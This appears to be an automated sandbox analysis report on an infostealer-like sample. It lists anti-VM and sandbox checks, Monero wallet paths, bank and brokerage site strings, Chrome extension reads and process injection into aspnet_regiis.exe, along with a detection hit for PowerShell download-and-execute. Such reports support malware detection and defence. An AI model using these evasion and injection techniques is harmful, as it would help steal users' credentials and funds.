                          Source: aspnet_regiis.exeBinary or memory string: API_LOG.DLL
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5640000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 6640000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 6770000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 7770000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 7AC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 9AC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 2221Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 857Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI coverage: 8.8 %
                          Source: C:\Users\user\Desktop\file.exe TID: 3048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh3_2_00410DDB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8120ED FindFirstFileExW,0_2_6E8120ED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: VMware
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75721
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75737
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-77061
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E81019C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E81019C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E813810 GetProcessHeap,0_2_6E813810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80BCC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E80BCC7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E81019C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E81019C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80C1F2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E80C1F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C7CB66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C7CB1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C97AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C97AC62
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F9DF0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,WriteProcessMemory,ResumeThread,0_2_6E7F9DF0
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2BD2008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80C3B8 cpuid 0_2_6E80C3B8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
